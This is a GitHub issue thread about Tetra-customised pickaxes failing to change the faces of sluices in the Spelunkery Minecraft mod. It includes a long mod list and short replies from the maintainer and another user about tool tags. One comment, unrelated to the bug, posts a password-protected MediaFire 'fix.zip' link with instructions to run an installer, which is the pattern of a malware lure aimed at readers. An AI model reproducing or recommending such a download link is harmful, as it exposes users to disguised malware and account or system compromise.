### ISSUE TITLE
Tetra pickaxes don't work to change the faces of sluices.

### ISSUE THREAD

**Issue by Graxum** [AstralOrdana/Spelunkery#260]
tetra bugreport

**Describe the bug:**
When you place down a sluice and try to right click it with a Tetra customized pickaxe, it does not change the mode.

**Versions: (BEFORE SUBMITTING A BUG REPORT, make sure you have the most up-to-date versions of Spelunkery, Moonlight Lib and Supplementaries)**
Minecraft version: 1.20.1
Spelunkery version: 1.20.1-0.3.5
Moonlight Lib version: 1.20-2.12.6
Fabric API / QSL / Forge version: 1.20.1-47.3.0
Supplementaries: 1.20-2.8.17

**Other mods:**
The only relevant mods should be Tetra and Spelunkery, but here's a list:
- adaptive_performance_tweaks_core 11.1.0
	- adaptive_performance_tweaks_gamerules 11.1.0
	- adaptive_performance_tweaks_items 11.1.0
	- adaptive_performance_tweaks_player 11.1.0
	- adaptive_performance_tweaks_spawn 11.1.0
	- advancementplaques 1.5.1
	- aiimprovements 0.5.2
	- alekiships 1.0.9
	- alexscaves 1.1.4
	- alexsdelight 1.5
	- alexsmobs 1.22.8
	- amendments 1.20-1.2.8
	- amplified_nether 1.2.5
	- apoli 1.20.1-2.9.0.8
	- apotheosis 7.4.0
	- appleskin 2.5.1+mc1.20.1
	- aquacombat 1.2
	- aquaculture 2.5.1
	- aquamirae 6.API15
	- architectury 9.2.14
	- arthys_rpg_arms 2.1.4
	- artifacts 9.5.11
		\-- expandability 9.0.4
	- astikorcarts 1.1.7
	- athena 3.1.2
	- ati_structures 1.1.0
	- attributeslib 1.3.5
	- azurelib 2.0.30
	- azurelibarmor 2.0.5
	- badmobs 19.0.2
	- badpackets 0.4.3
	- bakery 1.1.12.1
	- balm 7.3.6
		\-- kuma_api 20.1.8
	- barteringstation 8.0.0
	- bcc 4.0.8
	- betterarcheology 1.1.9-1.20.1
	- bettercombat 1.8.5+1.20.1
	- betterdeserttemples 1.20-Forge-3.0.3
	- betterdungeons 1.20-Forge-4.0.4
	- betterfortresses 1.20-Forge-2.0.6
	- betterjungletemples 1.20-Forge-2.0.5
	- betteroceanmonuments 1.20-Forge-3.0.4
	- betterstrongholds 1.20-Forge-4.0.3
	- bettervillage 3.1.0
	- betterwitchhuts 1.20-Forge-3.0.3
	- biomespawnpoint 2.2
	- blockrunner 8.0.4
	- blueprint 7.1.0
	- bookshelf 20.2.13
	- born_in_chaos_v1 1.0.0
	- brewery 1.1.9
	- bygonenether 1.3.2
	- caelus 3.2.0+1.20.1
	- calio 1.20.1-1.11.0.5
	- callablehorses 1.3.0.1
	- candlelight 1.2.13
	- carryon 2.1.2.7
	- casualness_delight 1.20.1-0.4n
	- cataclysm 1.99.5
	- caupona 1.20.1-0.4.9
	- charmofundying 6.5.0+1.20.1
		\-- spectrelib 0.13.15+1.20.1
	- chas 1.20
	- chestlock 1.0
	- chipped 3.0.6
	- chiselsandbits 1.4.148
		\-- scena 1.0.103
	- chunky 1.3.146
	- citadel 2.5.4
	- cloth_config 11.1.118
	- clumps 12.0.0.4
	- cofh_core 11.0.2
	- cold_sweat 2.2.5.1
	- collective 7.70
	- collectorsreap 1.3.2
	- comforts 6.3.5+1.20.1
	- completionistsindex 8.0.0
	- configured 2.2.3
	- connectivity 1.20.1-5.6
	- copycats 1.3.8+mc.1.20.1-forge
	- corgilib 4.0.1.3
	- coroutil 1.20.1-1.3.7
	- cosmeticarmorreworked 1.20.1-v1a
	- cpm 0.6.17b
	- create 0.5.1.f
		\-- flywheel 0.6.10-7
	- creativecore 2.11.30
	- creeperoverhaul 3.0.2
	- cristellib 1.1.5
	- culllessleaves 1.20.1-1.0.5
	- cupboard 1.20.1-2.7
	- curios 5.9.1+1.20.1
	- customvillagertrades 20.25.0
	- cutthrough 8.0.2
	- davespotioneering 11
	- dawnoftimebuilder 1.5.7
	- decorative_blocks 4.1.3
	- doapi 1.2.15
		\-- terraform 7.0.1
	- domesticationinnovation 1.7.1
	- dungeonnowloading 1.5
	- dungeons_arise_seven_seas 1.0.2
	- dynamiclightsreforged 1.20.1_v1.6.0
	- easyanvils 8.0.2
	- ecologics 2.2.0
	- elenaidodge2 1.1
	- embeddium 0.3.22+mc1.20.1
		\-- rubidium 0.7.1
	- embeddiumplus 1.2.13
	- emi 1.1.8+1.20.1+forge
	- emi_loot 0.6.6+fix3+1.20.1+forge
	- emiffect 1.1.2+mc1.20.1
	- emitrades 1.2.1+mc1.20.1
	- emotecraft 2.2.7-b.build.50
	- endermanoverhaul 1.0.4
	- endlessbiomes 1.5.1
	- endrem 5.2.3-R-1.20.1
	- enlightened_end 5.0.14
	- ensorcellation 5.0.2
	- epicsamurai 0.0.46-1.20.1-neo
	- exposure 1.7.1
	- exposure_catalog 1.0.0
	- extrakeybinds 1.0a
	- farmersdelight 1.20.1-1.2.4
	- fastbench 8.0.4
	- fastboot 1.1
	- fasterdonkeys 1.0
	- fastfurnace 8.0.2
	- fastload 3.4.0
	- fastsuite 5.0.1
	- feathers 1.1
	- ferritecore 6.0.1
	- finsandtails 1.20.1-1.1.3
	- flib 0.0.12
	- flying_stuff 0.3.0
	- forge 47.3.0
	- framework 0.7.6
	- ftbessentials 2001.2.2
	- ftblibrary 2001.2.2
	- fumo 15.0.0
	- fusion 1.1.1
	- geckoanimfix 1.0.0
	- geckolib 4.4.7
	- geophilic 2.4.3
	- geophilic_reforged 1.2.0
	- gnumus 1.0.0
	- goblintraders 1.9.3
	- gravestone 1.20.1-1.0.16
	- guardvillagers 1.20.1-1.6.6
	- handcrafted 3.0.6
	- harderfarther 46.29.1
	- healingcampfire 6.0
	- herbalbrews 1.0.8
	- horsecombatcontrols 1.20.1-1.0.1
	- horseexpert 8.1.1
	- horsescanswim 1.0.1
	- iceberg 1.1.21
	- illagerinvasion 8.0.5
	- immersive_aircraft 1.0.1+1.20.1
	- immersive_melodies 0.3.0+1.20.1
	- incontrol 1.20-9.2.6
	- insanelib 1.13.5
	- interaction_boxes 0.693
	- inventorysorter 23.0.1
	- irons_spellbooks 1.20.1-3.2.0
	- item_obliterator 2.3.0
	- jade 11.9.2+forge
	- jadeaddons 5.2.2
	- jei 15.4.0.9
	- justleveling 1.7
	- justplayerheads 4.0
	- knightquest 1.4.1
	- kobolds 2.11.3
	- konkrete 1.8.0
	- kotlinforforge 4.11.0
	- kubejs 2001.6.5-build.14
	- kubejsdelight 1.1.1
	- letfishlove 2.0.4
	- lets_forge_bronze_and_iron 3.10
	- lfpirates 3.10.1
	- libertyvillagers 2.0.0+forge+1.20.1
	- libraryferret 4.0.0
	- limitmobspawn 20.1.1
	- lionfishapi 1.9
	- loot_journal 3.1.1
	- lootintegrations 1.20.1-3.7
	- lootjs 1.20.1-2.12.0
	- lootr 0.7.34.85
	- luckperms 5.4.102
	- magistuarmory 9.8
	- magnumtorch 8.0.2
	- majruszlibrary 7.0.8
	- majruszsdifficulty 1.9.10
	- majruszsenchantments 1.10.8
	- map_atlases 1.20-6.0.7
	- mcwdoors 1.1.1
	- mcwwindows 2.2.1
	- medievalorigins 6.4.4+1.20.1-forge
		\-- apugli 2.10.2+1.20.1-forge
	- melody 1.0.2
	- mighty_mail 1.0.14
	- minecraft 1.20.1
	- mna 3.0.0.19
	- moblassos 8.0.1
	- mobtimizations 1.20.1-1.0.0
	- modernfix 5.18.6+mc1.20.1
	- moonlight 1.20-2.12.6
	- morevillagers 5.0.0
	- mowziesmobs 1.6.4
	- mr_dungeons_andtaverns 3.0.3.f
	- mr_mount_ride 1.2.1
	- mr_tidal_towns 1.3
	- mutantmonsters 8.0.7
	- mutil 6.1.1
	- naturescompass 1.20.1-1.11.2-forge
	- necronomicon 1.4.2
	- nerb 0.3
	- netherchested 8.0.3
		|-- puzzlesaccessapi 8.0.9
		\-- puzzlesapi 8.1.5
	- nethers_exoticism 1.2.8
	- nethersdelight 1.20.1-4.0
	- nocreeperexplosion 1.20.x-1.0.1
	- noisium 2.0.3+mc1.20-1.20.1
	- nonetherportal 1.20.1-1.0
	- nyfsspiders 2.1.1
	- obscure_api 15
	- observable 4.4.1
	- octolib 0.3
	- oldguns 1.20.1-3.9.1-50
	- origins 1.20.1-1.10.0.9
		\-- additionalentityattributes 1.4.0.5+1.20.1
	- paraglider 20.1.3
	- parry 2.5.0
	- patchouli 1.20.1-84-FORGE
	- pehkui 3.8.2+1.20.1-forge
		\-- mixinextras 0.3.6
	- placebo 8.6.2
	- playeranimator 1.0.2-rc1+1.20
	- playerrevive 2.0.25
	- polymorph 0.49.5+1.20.1
	- prism 1.0.5
	- progressivebosses 3.9.7-mc1.20.1
	- puzzleslib 8.1.21
	- pvp_flagging 1.20.1-1.0.0
	- rainbowreef 2.1-1.20.1
	- ramcompat 0.1.3
	- realmrpg_demons 0.9.0
	- realmrpg_quests 0.1.1
	- realmrpg_skeletons 1.0.3
	- redeco 1.11.0
	- regions_unexplored 0.5.5
	- regrowth 46.31.2
	- relics 0.6.5.2
	- reliquary 1.20.1-2.0.41.1229
	- repurposed_structures 7.1.15+1.20.1-forge
	- resourcefulconfig 2.1.2
	- resourcefullib 2.1.25
	- responsiveshields 2.3
	- rhino 2001.2.2-build.18
	- ribbits 1.20.1-Forge-3.0.0
	- riverredux 0.3.1
	- roost 1.1.0
	- royalvariations 1.0.0
	- seadwellers 2.9.9
	- searchables 1.0.3
	- secondchanceforge 1.5.1
	- sereneseasons 9.0.0.46
	- simplyswords 1.55.0-1.20.1
	- skyvillages 1.0.4
	- smoothchunk 1.20.1-3.6
	- solapplepie 1.20.1-2.3.0
	- sootychimneys 1.2.1
	- sophisticatedbackpacks 3.20.5.1044
	- sophisticatedcore 0.6.22.611
	- sound_physics_remastered 1.20.1-1.4.2
	- spark 1.10.53
	- sparsestructuresreforged 1.20.1-0.0.1
	- spartanshields 3.1.1
	- spartanweaponry 3.1.0-beta-1
	- spelunkery 1.20.1-0.3.5
	- starlight 1.1.2+forge.1cda73c
	- storagedrawers 12.0.3
	- structureessentials 1.20.1-3.4
	- supermartijn642configlib 1.1.8
	- supermartijn642corelib 1.1.17
	- supplementaries 1.20-2.8.17
		\-- mixinsquared 0.1.1
	- t_and_t 0.0NONE
	- takesapillage 1.0.3
	- tarotcards 1.20-1.6.4
	- tectonic 2.3.5a
	- terrablender 3.0.1.7
	- terralith 2.5.4
	- tetra 6.3.0
	- tetracelium 1.2.0
	- tetraextras 0.1.4-1.20.1
	- tetranichematerials 1.0.0
	- tetratic_combat_expanded 2.7.1
	- tipsmod 12.0.5
	- toms_storage 1.6.8
	- totw_modded 1.0.5
	- transmog 1.3.0+1.20
	- treechop 0.18.8
	- trowelsfork 2.0.0
	- twigs 1.20.1-3.1.1
	- unbreakables 1.0.0
	- uniquedungeons 0.70.3
	- universalbonemeal 8.0.1
	- valhelsia_core 1.1.2
	- valhelsia_furniture 1.1.3
	- valhelsia_structures 1.20.1-1.1.2
	- villagernames 8.0
	- villagesandpillages 1.0.0
	- vinery 1.4.25
	- visuality 2.0.2
	- voicechat 1.20.1-2.5.18
	- watut 1.20.1-1.1.1
	- weaponmaster_ydm 4.2.3
	- wi_zoom 1.5-MC1.20.1-Forge
	- wits 1.1.0+1.20.1-forge
	- worldedit 7.2.15+6463-5ca4dff
	- xercapaint 1.20.1-1.0.0
	- ysns 1.0.2
	- yungsapi 1.20-Forge-4.0.5

**Logs:**
*Even if the game does not crash they may be useful!*
Please provide the following logs:
From .minecraft/logs :  "latest.log" as well as "debug.log" if it exists. From .minecraft : "launcher_log"
logs have been provided at the bottom.

**To Reproduce:**

1. Grab a pickaxe modified with the Tetra mod
2. Place down a sluice
3. Try to right click on any face, you will see that the face doesn't change

**Expected behavior:**
The face of the sluice should change

**Screenshots:**
none

**Additional info:**
I suspect this might be an issue with Tinkers construct/Hephaestus pickaxes too, but I'm not sure.
If the wooden sluices' faces are changed with an axe, I suspect that Tetra axes/tools also don't work with wooden sluices, but I haven't tested that yet.

**It would be great if there was a config that added a whitelist of tools that allowed the face of sluices to be changed upon right clicking.**

[debug.log](https://github.com/user-attachments/files/16784072/debug.log)
[latest.log](https://github.com/user-attachments/files/16784076/latest.log)

**Comment by scheichreisuli** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by AstralOrdana** [comment]
not much i can do about this, i check for instances of pickaxe items which is the standard way to add compat for modded tools

**Comment by SiverDX** [comment]
wouldn't a tag check be better?
or a check if the tool is effective for the block?

(axe would be effective for wood e.g. and pickaxe for stone)

(just checked and you do use the pickaxes / axes tags, so ppl would already just have to add said tetra tools to these tags)
